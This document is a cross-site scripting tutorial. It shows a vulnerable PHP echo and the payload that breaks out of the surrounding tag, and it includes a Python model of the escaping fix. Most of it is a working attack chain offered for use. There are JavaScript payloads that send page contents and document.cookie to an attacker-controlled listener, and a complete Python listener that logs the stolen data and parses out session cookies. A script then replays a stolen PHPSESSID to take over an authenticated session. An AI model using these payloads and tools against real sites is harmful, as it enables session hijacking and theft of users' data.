Cross-Site Scripting (XSS)
<?php
// Vulnerable: the search parameter is echoed into the HTML response with no encoding.
echo '<div><p>Searched string: ' . $_GET['search'] . '</p></div>';
?>
http(s)://HOST/file.php?search=1
<div><p>Searched string: 1</p></div>
http(s)://HOST/file.php?search=</p><script>alert()</script><p>
<div><p>Searched string: </p><script>alert()</script><p></p></div>
As you can see, the injected code is inserted verbatim into the HTML response, so the browser parses it as part of the page and executes it.
</p>
-> Closing current tag.
<script>
-> Opening javascript tag.
alert()
-> Function to pop an alert box.
</script>
-> Closing javascript tag.
<p>
-> Reopening the p tag so the rest of the response is not broken.

In a stored XSS, the injected code is saved by the application (e.g. as a comment, name, description, etc.) and runs every time the stored value is displayed to a user, not only when someone follows a crafted link.
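To see the reflection and the fix side by side, here is an added Python model of the PHP line above (example code, not the page's own): render_unsafe mirrors the unencoded echo, render_safe applies html.escape (the equivalent of PHP's htmlspecialchars), and a small reflection probe shows why the encoded version cannot break out of the p tag. The function names and the canary string are my choices.

```python
import html
import re

# Added example: a Python model of the vulnerable PHP line
#   echo '<div><p>Searched string: ' . $_GET['search'] . '</p></div>';
# next to an encoded version. Function names are assumptions, not the page's code.

PAYLOAD = "</p><script>alert()</script><p>"  # the payload used on this page


def render_unsafe(search: str) -> str:
    """Reflects the parameter into the HTML response with no encoding (the vulnerable behaviour)."""
    return "<div><p>Searched string: " + search + "</p></div>"


def render_safe(search: str) -> str:
    """Same template, but the parameter is HTML-encoded first.
    html.escape(..., quote=True) is the equivalent of PHP's htmlspecialchars($s, ENT_QUOTES)."""
    return "<div><p>Searched string: " + html.escape(search, quote=True) + "</p></div>"


def reflected_unescaped(render, canary: str = "zqx9") -> bool:
    """Reflection probe: submit a harmless made-up tag and check whether it comes back as a tag.
    Encoded output turns '<' into '&lt;', so the raw tag only survives when output is unsafe."""
    marker = "<" + canary + ">"
    return marker in render(marker)


def contains_script_tag(response: str) -> bool:
    """Does the response contain a script tag the browser would execute?"""
    return re.search(r"<script\b", response, re.IGNORECASE) is not None


def demo() -> dict:
    """Runs the page's payload through both renderers and reports the probe result for each."""
    return {
        "unsafe": render_unsafe(PAYLOAD),
        "safe": render_safe(PAYLOAD),
        "unsafe_probe": reflected_unescaped(render_unsafe),
        "safe_probe": reflected_unescaped(render_safe),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

The probe is the same check a scanner performs: send a unique marker in a tag and look for it unencoded in the body. A hit means the parameter is reflected into an HTML text context without encoding, which is exactly the condition the page's payload exploits.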
To exfiltrate data, a receiving server under your control is needed, e.g. an HTTP listener.
To expose it: ngrok (or a substitute for it such as tunXs). To listen: Python's SimpleHTTPServer / http.server. Note that a plain http.server only logs the request line, so data placed in a GET query string appears in its log, while a POST body does not (it answers 501 to POST and discards the body).
<html>
<script>
// Send the data to your listener. A text body makes this a "simple" cross-origin request,
// so the browser sends it without a CORS preflight (you cannot read the reply, but you don't need to).
first = new XMLHttpRequest();
first.open("POST", "YOUR-SERVER");
first.send("EXFILTRATED-DATA");
</script>
</html>
<html>
<script>
// Fetch a page from the vulnerable site in the victim's session (same origin, so the
// cookies are attached and the response is readable), then forward it to your listener.
first = new XMLHttpRequest();
first.open("GET", "TARGET-SERVER");
first.onreadystatechange = function () {
    if (first.readyState === XMLHttpRequest.DONE) {
        second = new XMLHttpRequest();
        second.open("POST", "YOUR-SERVER");
        second.send(first.responseText); // the fetched page is the exfiltrated data
    }
}
first.send();
</script>
</html>
In a nutshell: stealing the session cookie of an administrator or other authenticated user and reusing it. This only works if the cookie was set without the HttpOnly flag; with HttpOnly, document.cookie does not expose it, and you have to fall back to the chained-request technique above (acting from inside the victim's browser instead of taking the cookie out of it).
<html>
<script>
// Ship the victim's cookies for this origin to your listener.
// Only cookies set without the HttpOnly flag are visible to document.cookie.
first = new XMLHttpRequest();
first.open("POST", "YOUR-SERVER");
first.send(document.cookie);
</script>
</html>
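The exfiltration snippets above (the POST-body and chained GET variants, and the cookie stealer) all need something at YOUR-SERVER that records what arrives. Here is an added Python listener built on http.server (example code, not from the page or any project it describes): it accepts GET and POST, writes each request as a JSON line, and splits a document.cookie string into name/value pairs so the session cookie is ready to reuse. The log file name, the port, the 204 reply and the CORS header are my choices; the sample requests in the usage note are constructed.

```python
import json
import sys
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs, unquote, urlparse

LOG_FILE = "exfil.log"   # assumption: captured requests are appended here as JSON lines


def parse_cookie_string(s: str) -> dict:
    """Split a document.cookie string ('PHPSESSID=abc; theme=dark') into a dict."""
    cookies = {}
    for part in s.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep:
            cookies[name] = value
    return cookies


def parse_exfil(method: str, path: str, body: bytes) -> dict:
    """Turn one incoming request into a record.

    POST: the body is the exfiltrated data (first.send(document.cookie) / first.send(data)).
    GET:  the data is in the query string (e.g. YOUR-SERVER/?PHPSESSID%3Dabc).
    The raw text is always kept; if it looks like a cookie string it is also split up.
    """
    parsed = urlparse(path)
    text = body.decode("utf-8", "replace") if body else unquote(parsed.query)
    return {
        "method": method,
        "path": parsed.path,
        "query": {k: v[0] if len(v) == 1 else v for k, v in parse_qs(parsed.query).items()},
        "data": text,
        "cookies": parse_cookie_string(text),
    }


class ExfilHandler(BaseHTTPRequestHandler):
    """Accepts GET and POST, records the request, and answers with an empty 204."""

    def _record(self):
        length = int(self.headers.get("Content-Length") or 0)
        body = self.rfile.read(length) if length else b""
        record = parse_exfil(self.command, self.path, body)
        record["client"] = self.client_address[0]
        with open(LOG_FILE, "a") as f:
            f.write(json.dumps(record) + "\n")
        print(json.dumps(record), file=sys.stderr)
        # A text/plain POST or a GET is sent by the victim's browser without a CORS
        # preflight, so nothing special is needed for the data to arrive; answering 204
        # with Access-Control-Allow-Origin just keeps the victim's console free of errors.
        self.send_response(204)
        self.send_header("Access-Control-Allow-Origin", "*")
        self.end_headers()

    do_GET = _record
    do_POST = _record

    def log_message(self, format, *args):
        pass  # default access log suppressed; the JSON line above replaces it


if __name__ == "__main__":
    port = int(sys.argv[1]) if len(sys.argv) > 1 else 8000
    print(f"listening on 0.0.0.0:{port}, writing {LOG_FILE}", file=sys.stderr)
    HTTPServer(("0.0.0.0", port), ExfilHandler).serve_forever()
```

Run it with `python3 listener.py 8000` and point ngrok (or whatever tunnel you use) at that port. A constructed POST body of `PHPSESSID=abc123; theme=dark` is logged with `"cookies": {"PHPSESSID": "abc123", "theme": "dark"}`, which is the value the replay script below needs; the same string sent URL-encoded in a GET query produces the same record.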
import requests

url = ""                 # the authenticated page on the target, e.g. http(s)://HOST/admin.php
exfiltrated_cookie = ""  # the value captured by your listener
cookies = {'PHPSESSID': f"{exfiltrated_cookie}"}  # Example: PHP's default session cookie name
r = requests.get(url, cookies=cookies)
print(r.status_code, r.url)  # a redirect to the login page usually means the session was not accepted